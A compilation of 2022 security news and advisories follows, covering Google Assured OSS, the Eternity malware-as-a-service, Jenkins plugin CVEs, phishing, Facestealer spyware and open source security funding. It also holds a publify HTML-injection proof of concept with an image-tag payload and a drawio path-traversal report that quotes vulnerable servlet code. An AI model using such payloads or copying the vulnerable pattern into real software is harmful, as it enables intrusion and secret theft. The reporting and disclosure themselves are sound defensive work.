The online giant analyzes, patches, and maintains its own versions of open source software, and now the company plans to give others access to its libraries and components as a subscription.

Developers who want to benefit from Google's security efforts will soon be able to subscribe to a service that allows developers to use open source components that they know have been vetted and patched for security issues by Google's developers.  

The service, dubbed Assured Open Source Software (OSS), provides versions of popular open source packages that are scanned frequently, augmented by metadata created by code analysis, comply with the nascent Supply chain Levels for Software Artifacts (SLSA) framework, and are signed by Google. 

In many ways, the service is similar to the curated Linux distributions maintained by companies such as Red Hat and Ubuntu, says Eric Brewer, vice president of infrastructure for Google Cloud and a Google Fellow.

"The idea of having curated version is not new per se, but it is just more important than ever," he says. "Plus, we wanted to show that it is important to actually do the provenance, do the metadata, do the scanning, do the fuzzing, build it from source — and sign it. That's the right way to do it."

The announcement of the new service comes a week after the Linux Foundation and the Open Software Security Foundation, along with the support of nearly 40 companies, released a plan for securing open source software. That effort is focused on 10 separate initiatives in three broad areas: securing open source production, improving vulnerability discovery and remediation, and speeding patch cadence.

While Google is a major sponsor of the effort and has provided technology and specifications for a myriad of security-focused efforts — such as Security Scorecards, AllStars, and the Alpha Omega Project — Assured OSS will be eventually be a paid, commercial service, Brewer says.

"Last week was about the community focus," Brewer says. "But you ... \[also\] need a lot of private investment from many different companies to make these things better, easier to use, and you also need — especially for the critical core stuff — you need a lot of industry cooperation."

    

Open source software requires companies to analyze and maintain commonly used components. Source: Google Cloud blog

**Scanning, Fuzzing, and Checking on 100K Cores  
**While most companies maintain their own package management system as a private repository, Google's level of vetting and security testing is significant, when looking at the numbers.

The company has an end-to-end process that includes continuous fuzzing of more than 500 of the most popular packages, using a massive infrastructure based on 100,000 processor cores, Google stated in a blog post announcing the Assured OSS service. The company also provides software bill of materials (SBOM) and supply chain integrity checking through the SLSA framework.

The Assured OSS framework will also natively integrate with software-security analytics firm Snyk.

"We recognize that most organizations do not have the resources or experience to construct and operate such a comprehensive program," Google Cloud stated in its blog post. "Instead, their development teams might individually decide where they get third-party source code and packages, how they are built, and how to redistribute them within their own organizations according to their goals, threat and risk model, and resources."

**Overlapping Efforts Pose inefficiency Risk  
**Google is not alone in offering a curated collection of vetted open source software. In addition to the aforementioned Linux distros, a variety of companies — such as Anaconda — have created vetted repositories that include managing both patching and integrity issues for companies. In addition, other companies — such as Snyk, Sonotype, and Debricked — offer ways to evaluate open-source projects and libraries based on security metrics.

Google's new service raises the specter, however, that multiple companies will offer overlapping services that provide similar analyses of the top 500 packages, but do not venture into vetting packages that are less popular but still important. While redundancy is often a good attribute — because a company could find a vulnerability that another company misses — it is important for organizations to also provide more coverage across a greater number of packages, Brewer acknowledges .

"There are lots of ways to work together, but I think open source by its nature, because it is already shared, requires we work together better," he says. "So at a minimum, we should make sure that we are fixing different packages, rather than fixing the same packages — it would be globally inefficient to do that."

Assured OSS will be available to preview sometime in the third quarter of 2022, according to Google.

Google Cloud Aims to Share Its Vetted Open Source Ecosystem

A one-stop shop for data and crypto kleptomaniacs

A one-stop shop for data and crypto kleptomaniacs

Malware that steals passwords, cookies, and payment card data from web browsers is being sold via a Telegram channel and a Tor website, security researchers have discovered.

Collectively named the ‘Eternity Project’ by its architects, the suite of malware already includes stealers, clippers, worms, miners, and ransomware, with a Distributed Denial of Service (DDoS) bot apparently under development.

A Telegram channel provides information about forthcoming software updates and videos documenting the malware’s functionality to around 500 subscribers.

Catch up on the latest malware news and attacks

“Interestingly, individuals who purchase the malware can utilize the Telegram Bot to build the binary,” according to a blog post by Cyble Research Labs.

“The TAs \[threat actors\] provide an option in the Telegram channel to customize the binary features, which provides an effective way to build binaries without any dependencies.”

**Versatile**

A Stealer module, which costs $260 for an annual subscription, also exfiltrates AutoFill data, tokens, history, and bookmarks from Chrome, Chromium, Firefox, Edge, Opera, and more than 20 other browsers.

Other data extracted from infected machine to the threat actor’s Telegram bot are various system credentials, and cryptocurrency via a wide range of crypto-wallets and browser cryptocurrency extensions.

Eternity ransomware, meanwhile, can encrypt documents, photos, and databases on disks, local shares, and USB drives on compromised machines.

The ransomware facility – the most expensive option at $490 – offers offline encryption, an encryption algorithm combining AES and RSA, and the option to set a time limit after which files cannot be decrypted.

The Eternity worm, priced at $390, propagates through infected machines via local files and local network shares; Google Drive, OneDrive, and DropBox; and Discord, Telegram, and Python Interpreter.

For $110, budding cybercrooks can harness clipper malware that supports multiple address formats for BTC, LTC, ZEC, and BCH, while a $90-a-year cryptocurrency mining module offers silent Monero mining and automatic restarts.

**Cybercrime increase**

Researchers suspect the developer behind the Eternity Project is repurposing code in the ‘DynamicStealer’ GitHub repository, and have identified possible links with the threat actor behind the Jester Stealer malware Cyble documented in February.

Cyble Research Labs said it had recently “observed a significant increase in cybercrime through Telegram channels and cybercrime forums”.

Individuals and organizations are advised to protect themselves by installing reputable security software, enabling automatic software updates if practicable, regularly backing up data and keeping backups offline or on a separate network, and refraining from opening untrusted links and email attachments without verifying their authenticity.

YOU MIGHT ALSO LIKE Researcher stops REvil ransomware in its tracks with DLL-hijacking exploit

‘Eternity malware’ offers Swiss Army knife of cybercrime tools

A cross-site request forgery (CSRF) vulnerability in Jenkins Script Security Plugin 1158.v7c1b_73a_69a_08 and earlier allows attackers to have Jenkins send an HTTP request to an attacker-specified webserver.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[day\] \[month\] \[year\] \[list\]

Date: Tue, 17 May 2022 15:13:45 +0200
From: Daniel Beck <ml@...kweb.net>
To: oss-security@...ts.openwall.com
Subject: Multiple vulnerabilities in Jenkins plugins


Jenkins is an open source automation server which enables developers around
the world to reliably build, test, and deploy their software.

The following releases contain fixes for security vulnerabilities:

\* Application Detector Plugin 1.0.9
\* Blue Ocean Plugin 1.25.4
\* Git Plugin 4.11.2
\* GitLab Plugin 1.5.32
\* Mercurial Plugin 2.16.1
\* Multiselect parameter Plugin 1.4
\* Pipeline SCM API for Blue Ocean Plugin 1.25.4
\* Pipeline: Groovy Plugin 2692.v76b\_089ccd026
\* REPO Plugin 1.14.1
\* Rundeck Plugin 3.6.11
\* Script Security Plugin 1172.v35f6a\_0b\_8207e
\* WMI Windows Agents Plugin 1.8.1

Additionally, we announce unresolved security issues in the following
plugins:

\* Autocomplete Parameter Plugin
\* Global Variable String Parameter Plugin
\* JDK Parameter Plugin
\* Promoted Builds (Simple) Plugin
\* Random String Parameter Plugin
\* Selection tasks Plugin
\* SSH Plugin
\* Storable Configs Plugin
\* vboxwrapper Plugin

Summaries of the vulnerabilities are below. More details, severity, and
attribution can be found here:
https://www.jenkins.io/security/advisory/2022-05-17/

We provide advance notification for security updates on this mailing list:
https://groups.google.com/d/forum/jenkinsci-advisories

If you discover security vulnerabilities in Jenkins, please report them as
described here:
https://www.jenkins.io/security/#reporting-vulnerabilities

---

SECURITY-359 / CVE-2022-30945
Pipeline: Groovy Plugin allows pipelines to load Groovy source files. This
is intended to be used to allow Global Shared Libraries to execute without
sandbox protection.

In Pipeline: Groovy Plugin 2689.v434009a\_31b\_f1 and earlier, any Groovy
source files bundled with Jenkins core and plugins could be loaded this way
and their methods executed. If a suitable Groovy source file is available
on the classpath of Jenkins, sandbox protections can be bypassed.

NOTE: The Jenkins security team has been unable to identify any Groovy
source files in Jenkins core or plugins that would allow attackers to
execute dangerous code. While the severity of this issue is declared as
High due to the potential impact, successful exploitation is considered
very unlikely.


SECURITY-2116 / CVE-2022-30946
Script Security Plugin 1158.v7c1b\_73a\_69a\_08 and earlier does not require
POST requests for a form validation endpoint, resulting in a cross-site
request forgery (CSRF) vulnerability.

This vulnerability allows attackers to have Jenkins send an HTTP request to
an attacker-specific webserver.


SECURITY-2478 / CVE-2022-30947 (Git) & CVE-2022-30948 (Mercurial) & CVE-2022-30949 (REPO)
SCMs support a number of different URL schemes, including local file system
paths (e.g. using \`file:\` URLs).

Historically in Jenkins, only agents checked out from SCM, and if multiple
projects share the same agent, there is no expected isolation between
builds besides using different workspaces unless overridden. Some
Pipeline-related features check out SCMs from the Jenkins controller as
well.

This allows attackers able to configure pipelines to check out some SCM
repositories stored on the Jenkins controller's file system using local
paths as SCM URLs, obtaining limited information about other projects' SCM
contents. The following Jenkins plugins are known to be affected:

\* Git 4.11.1 and earlier
\* Mercurial 2.16 and earlier
\* REPO 1.14.0 and earlier


SECURITY-2604 / CVE-2022-30950 (buffer overflow) & CVE-2022-30951 (access control)
WMI Windows Agents Plugin 1.8 and earlier includes the Windows Remote
Command library. It provides a general-purpose remote command execution
capability that Jenkins uses to check if Java is available, and if not, to
install it.

This library has a buffer overflow vulnerability that may allow users able
to connect to a named pipe to execute commands on the Windows agent
machine.

Additionally, while the processes are started as the user who connects to
the named pipe, no access control takes place, potentially allowing users
to start processes even if they're not allowed to log in.


SECURITY-714 / CVE-2022-30952
When pipelines are created using the pipeline creation wizard in Blue
Ocean, the credentials used are stored in the per-user credentials store of
the user creating the pipeline. To allow pipelines to use this credential
to scan repositories and checkout from SCM, the Blue Ocean Credentials
Provider allows pipelines to access a specific credential from the per-user
credentials store in Pipeline SCM API for Blue Ocean Plugin 1.25.3 and
earlier.

As a result, attackers with Job/Configure permission can rewrite job
configurations in a way that lets them access and capture any
attacker-specified credential from any user's private credentials store.


SECURITY-2502 / CVE-2022-30953 (CSRF) & CVE-2022-30954 (permission check)
Blue Ocean Plugin 1.25.3 and earlier does not perform permission checks in
several HTTP endpoints.

This allows attackers with Overall/Read permission to send requests to an
attacker-specified URL.

Additionally, these endpoints do not require POST requests, resulting in a
cross-site request forgery (CSRF) vulnerability.


SECURITY-2753 / CVE-2022-30955
GitLab Plugin 1.5.31 and earlier does not perform a permission check in an
HTTP endpoint.

This allows attackers with Overall/Read permission to enumerate credentials
IDs of credentials stored in Jenkins. Those can be used as part of an
attack to capture the credentials using another vulnerability.


SECURITY-2600 / CVE-2022-30956
Rundeck Plugin 3.6.10 and earlier does not restrict URL schemes in Rundeck
webhook submissions.

This results in a stored cross-site scripting (XSS) vulnerability
exploitable by attackers able to submit crafted Rundeck webhook payloads.


SECURITY-2315 / CVE-2022-30957
SSH Plugin 2.6.1 and earlier does not perform a permission check in an HTTP
endpoint.

This allows attackers with Overall/Read permission to enumerate credentials
IDs of credentials stored in Jenkins. Those can be used as part of an
attack to capture the credentials using another vulnerability.

As of publication of this advisory, there is no fix.


SECURITY-2093 / CVE-2022-30958 (CSRF) & CVE-2022-30959 (permission check)
SSH Plugin 2.6.1 and earlier does not perform a permission check in an HTTP
endpoint.

This allows attackers with Overall/Read permission to connect to an
attacker-specified SSH server using attacker-specified credentials IDs
obtained through another method, capturing credentials stored in Jenkins.

Additionally, this endpoint does not require POST requests, resulting in a
cross-site request forgery (CSRF) vulnerability.

As of publication of this advisory, there is no fix.


SECURITY-2717 / CVE-2022-30960 through CVE-2022-30968
Multiple plugins do not escape the name and description of the parameter
types they provide:

\* Application Detector Plugin 1.0.8 and earlier (SECURITY-2732 /
  CVE-2022-30960)
\* Autocomplete Parameter Plugin 1.1 and earlier (SECURITY-2729 /
  CVE-2022-30961)
\* Global Variable String Parameter Plugin 1.2 and earlier (SECURITY-2715 /
  CVE-2022-30962)
\* JDK Parameter Plugin 1.0 and earlier (SECURITY-2713 / CVE-2022-30963)
\* Multiselect parameter Plugin 1.3 and earlier (SECURITY-2726 /
  CVE-2022-30964)
\* Promoted Builds (Simple) Plugin 1.9 and earlier (SECURITY-2720 /
  CVE-2022-30965)
\* Random String Parameter Plugin 1.0 and earlier (SECURITY-2722 /
  CVE-2022-30966)
\* Selection tasks Plugin 1.0 and earlier (SECURITY-2728 / CVE-2022-30967)
\* vboxwrapper Plugin 1.3 and earlier (SECURITY-2734 / CVE-2022-30968)

This results in stored cross-site scripting (XSS) vulnerabilites
exploitable by attackers with Item/Configure permission.

Exploitation of these vulnerabilities requires that parameters are listed
on another page, like the "Build With Parameters" and "Parameters" pages
provided by Jenkins (core), and that those pages are not hardened to
prevent exploitation. Jenkins (core) has prevented exploitation of
vulnerabilities of this kind on the "Build With Parameters" and
"Parameters" pages since 2.44 and LTS 2.32.2 as part of the SECURITY-353 /
CVE-2017-2601 fix. Additionally, several plugins have previously been
updated to list parameters in a way that prevents exploitation by default,
see SECURITY-2617 in the 2022-04-12 security advisory for a list.

As of publication of this advisory, there is no fix available for the
following plugins:

\* Autocomplete Parameter Plugin 1.1 and earlier (SECURITY-2729 /
  CVE-2022-30961)
\* Global Variable String Parameter Plugin 1.2 and earlier (SECURITY-2715 /
  CVE-2022-30962)
\* JDK Parameter Plugin 1.0 and earlier (SECURITY-2713 / CVE-2022-30963)
\* Promoted Builds (Simple) Plugin 1.9 and earlier (SECURITY-2720 /
  CVE-2022-30965)
\* Random String Parameter Plugin 1.0 and earlier (SECURITY-2722 /
  CVE-2022-30966)
\* Selection tasks Plugin 1.0 and earlier (SECURITY-2728 / CVE-2022-30967)
\* vboxwrapper Plugin 1.3 and earlier (SECURITY-2734 / CVE-2022-30968)


SECURITY-2322 / CVE-2022-30969
Autocomplete Parameter Plugin 1.1 and earlier does not require POST
requests for a form validation endpoint executing a provided Groovy script,
resulting in a cross-site request forgery (CSRF) vulnerability.

This vulnerability allows attackers to execute arbitrary code without
sandbox protection if the victim is an administrator.

As of publication of this advisory, there is no fix.


SECURITY-2267 / CVE-2022-30970
Autocomplete Parameter Plugin 1.1 and earlier references Dropdown
Autocomplete parameter and Auto Complete String parameter names in an
unsafe manner from Javascript embedded in view definitions.

This results in a stored cross-site scripting (XSS) vulnerability
exploitable by attackers with Item/Configure permission.

NOTE: While this looks similar to SECURITY-2729, this is an independent
problem and exploitable even on views rendering parameters that otherwise
attempt to prevent XSS vulnerabilities in parameter names.

As of publication of this advisory, there is no fix.


SECURITY-1969 / CVE-2022-30971 (XXE) & CVE-2022-30972 (CSRF)
Storable Configs Plugin 1.0 and earlier does not configure its XML parser
to prevent XML external entity (XXE) attacks.

This allows attackers with Item/Configure permission to have Jenkins parse
a crafted file that uses external entities for extraction of secrets from
the Jenkins controller or server-side request forgery.

Additionally, the HTTP endpoint calling the XML parser does not require
POST requests, resulting in a cross-site request forgery (CSRF)
vulnerability.

As of publication of this advisory, there is no fix.

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2022-30946: security - Multiple vulnerabilities in Jenkins plugins

Provides security architects with access to custom scripts that can be natively integrated with other Qualys solutions.

FOSTER CITY, Calif., May 17, 2022 /PRNewswire/ -- Qualys, Inc. (NASDAQ: QLYS), a pioneer and leading provider of disruptive cloud-based IT, security and compliance solutions, today unveiled Qualys Custom Assessment and Remediation, opening its Cloud Platform to give security architects access to custom scripts that can be natively integrated with other Qualys solutions. This new solution significantly reduces response time by empowering security teams to orchestrate workflows, secure custom applications, and take immediate action to counter threats like zero-day attacks lessening the need to rely on the IT operations teams.

When threats hit, security teams need to quickly discover, assess and remediate both their third-party and custom applications. A typical response involves creating new out-of-band processes and custom scripts that need to be rolled out across hundreds or thousands of applications and endpoints by the security teams using a variety of techniques and ITSM tools. This approach creates a blind spot from an auditing and tracking standpoint and negatively impacts responsiveness.

"Reducing mean time to respond (MTTR) is the key metric for managing security risk, but it requires having the right security tools in place to optimize efficiency," said Melinda Marks, senior analyst at Enterprise Strategy Group. "Qualys Custom Assessment and Remediation leverages the comprehensive capabilities of the Qualys Cloud Platform to speed up your ability to respond to a detected security issue. It provides centralized control while helping teams remediate issues within their existing tools and workflows, saving them from inefficient, costly out-of-band rework cycles."

Qualys Custom Assessment and Remediation opens the Qualys Platform for security architects allowing the creation of custom scripts in popular scripting languages, user-defined controls and automation, all seamlessly integrated within existing programs to quickly assess, respond and remediate threats across your global hybrid environment.

Qualys Custom Assessment and Remediation enables security teams to:

**Quickly Address Zero-Day Threats**– The solution puts the power to rapidly respond to zero-day vulnerabilities directly in the hands of the security team by automating processes such as collecting and evaluating data, synthesizing third-party threat intelligence feeds, and performing appropriate remediation actions, such as configuration changes, deleting suspicious files or deploying registry changes. The result is an accelerated MTTR, which is critical to containing an attack**.**

**Secure and Audit Custom Applications –** Security teams can add customized controls and processes, without IT intervention, for various organizational activities including remediation actions eliminating the need to reinvent new scripts. This improves efficiency and allows security practitioners time to focus on more strategic activities.

**Tightly Integrate into Qualys VMDR Workflows** – Scripts are seamlessly integrated into existing VMDR workflows via assignment of custom Qualys IDs and Control IDs, which increases efficiency.

**Access a Centralized Library for Custom Scripts and Controls** – The solution provides centralized control over custom scripts easily mapped into workflows, and it is secured by role-based access control (RBAC) as well as review and approval processes. Additionally, deployment of scripts is simplified by using a centrally managed and customizable library of more than 50 popular reusable scripts to address common problems.

"Security teams struggle to manage and respond to a range of challenges that often require custom approaches," said Nagi Prabhu, chief product officer, Qualys. "By opening the Qualys Platform, we put security teams in the driver's seat. Qualys Custom Assessment and Remediation enables the creation of custom scripts and controls that are seamlessly integrated into existing security processes and workflows while extending the capabilities of the Cloud Agent so organizations can respond to threats such as Zero-Days immediately."

**Availability**

Qualys Custom Assessment and Remediation is immediately available. To request a free trial, visit www.qualys.com/car-trial. Learn more by joining our June 1 webinar.

**Additional Resources**

*   Learn about Qualys Custom Assessment and Remediation
*   Details on the Qualys Cloud Platform
*   Follow Qualys on LinkedIn and Twitter

**About Qualys**

Qualys, Inc. (NASDAQ: QLYS) is a pioneer and leading provider of disruptive cloud-based security, compliance and IT solutions with more than 10,000 subscription customers worldwide, including a majority of the Forbes Global 100 and Fortune 100. Qualys helps organizations streamline and automate their security and compliance solutions onto a single platform for greater agility, better business outcomes, and substantial cost savings.

The Qualys Cloud Platform leverages a single agent to continuously deliver critical security intelligence while enabling enterprises to automate the full spectrum of vulnerability detection, compliance, and protection for IT systems, workloads and web applications across on premises, endpoints, servers, public and private clouds, containers, and mobile devices. Founded in 1999 as one of the first SaaS security companies, Qualys has strategic partnerships and seamlessly integrates its vulnerability management capabilities into security offerings from cloud service providers, including Amazon Web Services, the Google Cloud Platform and Microsoft Azure, along with a number of leading managed service providers and global consulting organizations. For more information, please visit http://www.qualys.com.

Qualys Adds Custom Assessment and Remediation to Its Cloud Platform

A Facebook Messenger phish is asking would-be victims to "take a look". But what lies in wait for eager clickers?
The post “Look what I found here” phish targets Facebook users appeared first on Malwarebytes Labs.

Facebook-themed messages are a frequent source of bogus links from both spam and compromised accounts. Whether you receive the messages via SMS, the Messenger app, or just inside regular web chat, it pays to be careful. A wide variety of attacks use bogus messages as their launchpad, and the risk of account compromise is ever-present. Phishing is not the only threat. Scammers will also happily send “check this out” messages and direct you to malware. This is why it’s crucial to be careful around links…any link. You just never know.

One such phishing message is currently doing the rounds in Dutch, and it plugs into a sense of FOMO to encourage you to click the link. It was first observed back in March, and appears to be making a comeback.

**How does this phish attack work?**

This is the message currently in circulation, being distributed through a compromised account:

> _Kijk eens wat ik hier heb gevonden?? \[url\]_

The message says “Look what I found here”.

This is a very common tactic, not giving anything away and almost baiting you into clicking. There’s a few others along these lines being sent to people in Facebook Messenger at the moment. One style of message is one that asks something along the lines of “Have you seen who died/Guess who died”. The answer, of course, is nobody has died. However, the aim of the game is to have you panic and hit the link without thinking.

It’s a similar technique in play here, although nowhere remotely as panic-inducing.

All the same, the link redirects to a fake Facebook page on what looks like a compromised photography website.

The site says “Facebook needs to verify that it’s you, log in to continue” and asks for mobile number/email and password.

Hitting the login button submits the data and redirects you through several different domains. In testing, we kept hitting a Google 404 error but you may well end up somewhere else depending on region, type of browser, device, and so on.

If you’ve entered your login after clicking through from a random message in this fashion, stop what you’re doing. Go to Facebook and change your password as soon as you possibly can.

**The power of “friendly” messaging**

The big problem with rogue messages via IM is the aspect of sender trust. If a link is sent to you from a total stranger on a public platform like Twitter, you’ll probably be sceptical and treat it with the caution it deserves. An SMS from a number you don’t recognise? They have some success depending on scam type, but you’d probably expect a banking phish or a fake parcel delivery message through that route.

But if you get a message from someone within your closed network of friends and family, where you may interact dozens or even hundreds of times a day, then it’s likely you’ll be clicking those links with a lot more confidence.

Sadly, accounts belonging to those you trust can be hijacked like any others. If your dad’s Facebook account was compromised yesterday and you woke to a link and a message which reads “Look what I found here”, what would you do?

Phishers know that if they can crack an account, it’ll almost certainly be allowed to send messages to people in its immediate circle as their security settings will permit them access. After all, you don’t add your closest relatives to Facebook and then _prevent_ them from sending you messages.

**Tips to avoid falling for rogue messages**

*   Watch out for messages which don’t logically follow on from the natural flow of a conversation, or a few hours after you stopped talking. “This you”, “Have you seen this photo”, “Did you hear who died”, “OMG I can’t believe it” all tied to a URL should raise some red flags.
*   If you’re presented with a “Login to view content” box, question why that is. If you’re on the Facebook website talking to someone and already logged in, there should be no reason why you’d be asked to login again. Check the URL. Does it say Facebook.com? Or is it a totally unrelated domain?
*   If you have an alternative method of communication with the person who sent you the message, try it. Ask them if they sent you a message on Facebook, and wait for their response before doing anything.
*   Enable 2-factor authentication (2FA). If you hand over your password to a phishing page, the phisher can’t do much with it while you’re protected with 2FA. This isn’t a silver bullet though, as more and more phishers are also taking 2FA codes with them when they phish your details.
*   Add login alerts to your Facebook account. If someone does manage to get hold of your login credentials and access your account, you’ll get notified by Facebook as soon as this happens so you can grab your account back as soon as possible.

Once your friend or family member regains access to their account, you can point them to these tips for keeping their own account locked down too. This way, you’ll be that little bit more safer next time account harvesting phishers are on the prowl.

Stay safe out there!

“Look what I found here” phish targets Facebook users

More than 200 Android apps masquerading as fitness, photo editing, and puzzle apps have been observed distributing spyware called Facestealer to siphon user credentials and other valuable information. 
"Similar to Joker, another piece of mobile malware, Facestealer changes its code frequently, thus spawning many variants," Trend Micro analysts Cifer Fang, Ford Quin, and Zhengyu Dong said in a

More than 200 Android apps masquerading as fitness, photo editing, and puzzle apps have been observed distributing spyware called **Facestealer** to siphon user credentials and other valuable information.

"Similar to Joker, another piece of mobile malware, Facestealer changes its code frequently, thus spawning many variants," Trend Micro analysts Cifer Fang, Ford Quin, and Zhengyu Dong said in a new report. "Since its discovery, the spyware has continuously beleaguered Google Play."

Facestealer, first documented by Doctor Web in July 2021, refers to a group of fraudulent apps that invade the official app marketplace for Android with the goal of plundering sensitive data such as Facebook login credentials.

Of the 200 apps, 42 are VPN services, followed by a camera (20) and photo editing applications (13). In addition to harvesting credentials, the apps are also designed to collect Facebook cookies and personally identifiable information associated with a victim's account.

Additionally, Trend Micro disclosed that it uncovered over 40 rogue cryptocurrency miner apps that target users interested in virtual coins with malware designed to trick users into watching ads and paying for subscription services.

Some of the fake crypto apps, such as Cryptomining Farm Your own Coin, take it one step further by also attempting to steal private keys and mnemonic phrases (or seed phrases) that are used to recover access to a cryptocurrency wallet.

To avoid falling victim to such scam apps, it's recommended that users check negative reviews, verify the legitimacy of the developers, and avoid downloading apps from third-party app stores.

**New study analyzes malicious Android apps installed in the wild**

The findings come as researchers from NortonLifeLock and Boston University published what they called the "largest on-device study" of potentially harmful apps (PHAs) on Android-based on 8.8 million PHAs installed on over 11.7 million devices between 2019 and 2020.

"PHAs persist on Google Play for 77 days on average and 34 days on third-party marketplaces," the study noted, pointing out the delay between when PHAs are identified and when they are removed, adding 3,553 apps exhibit inter-market migration after being taken down.

On top of that, the research also shows that PHAs linger for a much longer period on average when users switch devices and automatically install the apps when restoring from a backup.

As many as 14,000 PHAs are said to have been transferred to 35,500 new Samsung devices by using the Samsung Smart Switch mobile app, with the apps lasting on the phones for a period of approximately 93 days.

"The Android security model severely limits what mobile security products can do when detecting a malicious app, allowing PHAs to persist for many days on victim devices," the academics said. "The current warning system employed by mobile security programs is not effective in convincing users to promptly uninstall PHAs."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Over 200 Apps on Play Store Caught Spying on Android Users Using Facestealer

Maintainers of open source software (OSS) will gain additional security tools for their own projects, while the developers who use OSS — and about 97% of software does — will gain more data on security.

The maintainers of thousands of critical open source projects and the developers who build on the foundation of that code will both benefit from 10 security initiatives launched late last week by the Linux Foundation, the Open Source Security Foundation (OpenSSF), and 37 technology companies, the groups said — including tech bigwigs Amazon, Google, and Microsoft.

During a second summit of software industry professionals and government officials, the organizations committed to supporting a 10-step plan to shore up open source maintainers, provide tools to improve software security, and secure the software supply chain. 

The Open Source Software Security Mobilization Plan groups the 10 steps into three broad initiatives: securing open source software production, improving the discovery and remediation of vulnerabilities, and speeding the ecosystem's time to patch.

To show their commitment, a group of companies has pledged $30 million of the estimated $150 million needed to fund all 10 initiatives for the first two years, Brian Behlendorf, general manager of the OpenSSF, said during a press conference on Thursday. This initial $30 million comes from Amazon, Ericsson, Google, Intel, Microsoft, and VMWare.

"We realize that \[$150 million\] is a meaningful amount," he said. "It is an amount more than any one open source developer has, or even most open source projects. But when compared to the cost of remediating a major vulnerability out there, like we have seen in the last few years, it is a drop in the bucket — a very small ounce of prevention to spend for many, many pounds of cure."

The 10-step plan calls for educating and certifying developers in secure programming, creating and maintaining security metrics for the top 10,000 OSS components, promote digital signing of software releases, and replacing non-memory-safe languages, such as C and C++, with more modern alternatives, such as Go and Rust. The plan also calls for improving the discovery of vulnerabilities and their remediation by funding a team of experts to assist open source projects during incidents, provide advanced security tools, fund third-party reviews, and coordinate sharing of data to determine the most critical components.

The intent is to improve security without increasing workload, the open source foundations stated in the report.

"\[A\]ll forms of investment and intervention should be focused on delivering new value to OSS maintainers — from making it easier to adopt practices that enhance the security and integrity of their work, to funding activities like third party code reviews that most projects struggle to afford to perform on their own," the report stated. "Any investments or policies that place additional burdens on developers, increase their personal or professional liability for working on code, or issue unfunded mandates upon them, would struggle for adoption and potentially inhibit further advancements in open source software."  

**Developers & Maintainers to See More Tools  
**The main focus of the $150 million effort will be to produce tools, training. and services for developers and maintainers to create more secure software. Already, some tools have been released as part of the efforts of the OpenSSF and other supporters, such as Google. 

Google, for example, released a tool known as AllStars that automatically vets GitHub projects to flag any anomalies, which could indicate a security issue in the maintenance of the project. The company has also released a system, Scorecard, for rating projects in 18 different areas to give them a security rating. Google and the Linux Foundation, meanwhile, released a tool, sigstore, to help verify the integrity of software supply chains.

Such efforts are extremely important to reduce the impact of security efforts on developers' work, Stephen Chin, vice president of developer relations at software supply chain security firm JFrog, said in a statement.

"We believe open-source security will only be successful if we give OSS projects the same tools and services available to enterprises," he said. "Access to automated tools and high-quality security databases for open-source projects is essential and something that JFrog is committed to helping make happen."

Even more important than the tools are that the efforts create standards that allow interoperability between tool sets, Dan Lorenc — CEO and co-founder at Chainguard and a co-creator of sigstore — said in a statement.

"Interoperability is the linchpin in securing software throughout the supply chain," he said, adding: "These open source tools and projects are the core infrastructure for securing our digital world. But we know not every organization is in a position to go deep on learning each project, nor do they have dedicated staff to understand and integrate all of these tools."

**Gaining Momentum for Open Source Security Support  
**OpenSSF has already made a number of announcements of initiatives that will likely become components of the industry's approach to supporting the creation and maintenance of a more secure software supply chain. Earlier this year, for example, the group announced the Alpha-Omega Project, which aims to secure the most critical software by providing tools and support to maintainers. In March, the OpenSSF and the Laboratory for Innovation Science at Harvard announced four lists of 500 open source projects deemed most critical in two major ecosystems, the JavaScript-based Node Package Manager (NPM) and non-NPM frameworks.

In October, the OpenSSF announced that 16 premier members — including Amazon, Cisco, Facebook, Fidelity, Google, Microsoft, and Red Hat — along with 15 general members had  committed $10 million to expand and support the organization.

The broad base of support shows that open source security is a problem that affects every business using software, Brian Fox, CTO at Sonatype, said in a statement.

"It’s rare to see vendors, competitors, government, and diverse open source ecosystems all come together like they have today," he said. "It shows how massive a problem we have to solve in securing open source, and highlights that no one entity can solve it alone."

Open Source Security Gets $150M Boost From Industry Heavy Hitters

Code Injection in GitHub repository publify/publify prior to 9.2.8.

**Description**

The application doesn't check/filter the comments provided by the user before save to database. Attacker can't insert js code to steal admin's data but can insert html code, leads to many information security risks.

**Proof of Concept**

*   Step 1: Go to https://demo-publify.herokuapp.com/2022/02/11/hello-world#comments and comment in anonymous user.

    <img src=https://www.technistone.com/color-range/image-slab/Starlight%20Black_SLAB_web.jpg width="2000" height="2000"> 
    

*   Step 2: Login as demo user, go to https://demo-publify.herokuapp.com/admin/feedback. You can see html code has been rendered successfully.
*   PoC: https://drive.google.com/file/d/1RSuq7fsyJPrbNHqlZ9pRW3lgXAvmOrQf

**Impact**

Attacker can insert html code to break the website format, phishing or collect the admin's IP through loading images in img tags.

CVE-2022-0578: Code Injection in publify

Path Traversal in WellKnownServlet in GitHub repository jgraph/drawio prior to 18.0.5. Read local files of the web application.

**Description**

The WellKnownServlet is vulnerable to path traversal. This allows reading local files. For example the files in WEB-INF that contain secrets and API keys can be read.

https://github.com/jgraph/drawio/blob/v18.0.4/src/main/java/com/mxgraph/online/WellKnownServlet.java#L40-L66

            String uri = request.getRequestURI().replace("/.", "/");
    
            if (uri.toLowerCase().contains(".json"))
            {
                response.setContentType("application/json");
            }
    
            // Serve whatever was requested from .well-known
